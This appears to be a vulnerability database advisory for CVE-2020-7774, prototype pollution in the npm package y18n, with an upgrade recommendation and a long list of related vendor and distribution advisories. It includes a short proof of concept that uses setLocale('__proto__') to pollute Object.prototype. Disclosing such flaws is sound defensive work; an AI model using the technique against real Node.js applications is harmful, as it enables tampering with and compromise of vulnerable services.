AnonymousNODEJS:1654

HistoryMar 12, 2021 - 11:16 p.m.

Prototype Pollution

2021-03-1223:16:43

Anonymous

www.npmjs.com

0.304 Low

EPSS

Percentile

97.0%

JSON

Overview

y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to prototype pollution.

POC

const y18n = require('y18n')();
 
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});

console.log(polluted); // true

Recommendation

Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later

References

CPENameOperatorVersion
y18nlt3.2.2||=4.0.0||>=5.0.0 <5.0.5

CPE	Name	Operator	Version
	y18n	lt	3.2.2\|\|=4.0.0\|\|>=5.0.0 <5.0.5

redhatcve

CVE-2020-7774

2020-11-17 20:08:56

ubuntucve

CVE-2020-7774

2020-11-17 00:00:00

cve

CVE-2020-7774

2020-11-17 13:15:12

ibm

Security Bulletin: Open Source Dependency Vulnerability

2023-05-15 19:04:51

Security Bulletin: Prototype pollution flaw in y18n in IBM DataPower Gateway

2021-08-16 15:09:32

Security Bulletin: A security vulnerability in Node.js y18n module affects IBM Cloud Pak for Multicloud Management.

2021-02-19 05:07:57

debiancve

CVE-2020-7774

2020-11-17 13:15:12

veracode

Prototype Pollution

2020-10-21 09:45:49

osv

Prototype Pollution in y18n

2021-03-29 16:05:12

CVE-2020-7774

2020-11-17 13:15:12

Moderate: nodejs:12 security and bug fix update

2020-12-15 16:03:21

huntr

Prototype Pollution in yargs/y18n

2020-10-15 00:00:00

cvelist

CVE-2020-7774 Prototype Pollution

2020-11-17 00:00:00

prion

Code injection

2020-11-17 13:15:00

github

Prototype Pollution in y18n

2021-03-29 16:05:12

nvd

CVE-2020-7774

2020-11-17 13:15:12

alpinelinux

CVE-2020-7774

2020-11-17 13:15:12

mageia

Updated nodejs packages fix security vulnerabilities

2021-07-25 17:45:06

freebsd

Node.js -- April 2021 Security Releases

2021-04-06 00:00:00

nessus

FreeBSD : Node.js -- April 2021 Security Releases (c0c1834c-9761-11eb-acfd-0022489ad614)

2021-04-14 00:00:00

openSUSE 15 Security Update : nodejs8 (openSUSE-SU-2021:2618-1)

2021-08-06 00:00:00

openSUSE 15 Security Update : nodejs8 (openSUSE-SU-2021:1113-1)

2021-08-11 00:00:00

openvas

openSUSE: Security Advisory for nodejs8 (openSUSE-SU-2021:2618-1)

2021-08-07 00:00:00

SUSE: Security Advisory (SUSE-SU-2021:2618-1)

2021-08-06 00:00:00

openSUSE: Security Advisory for nodejs8 (openSUSE-SU-2021:1113-1)

2021-08-11 00:00:00

almalinux

Moderate: nodejs:12 security and bug fix update

2020-12-15 16:03:21

Moderate: nodejs:14 security and bug fix update

2021-02-16 07:34:42

Moderate: nodejs:10 security update

2021-02-16 07:34:15

suse

Security update for nodejs8 (important)

2021-08-05 00:00:00

Security update for nodejs8 (important)

2021-08-10 00:00:00

Security update for nodejs14 (important)

2021-07-15 00:00:00

nodejsblog

April 2021 Security Releases

2021-04-06 00:00:00

oraclelinux

nodejs:12 security and bug fix update

2020-12-17 00:00:00

nodejs:14 security and bug fix update

2021-02-20 00:00:00

nodejs:10 security update

2021-02-20 00:00:00

redhat

(RHSA-2020:5499) Moderate: nodejs:12 security and bug fix update

2020-12-15 16:03:21

(RHSA-2020:5305) Moderate: rh-nodejs12-nodejs security update

2020-12-01 14:18:32

(RHSA-2021:0551) Moderate: nodejs:14 security and bug fix update

2021-02-16 07:34:42

rocky

nodejs:12 security and bug fix update

2020-12-15 16:03:21

nodejs:14 security and bug fix update

2021-02-16 07:34:42

nodejs:10 security update

2021-02-16 07:34:15

gentoo

Node.js: Multiple Vulnerabilities

2024-05-08 00:00:00

ics

Siemens SINEC INS

2022-03-10 12:00:00

oracle

Oracle Critical Patch Update Advisory - April 2021

2021-04-20 00:00:00

Prototype Pollution

Overview

POC

Recommendation

References

Related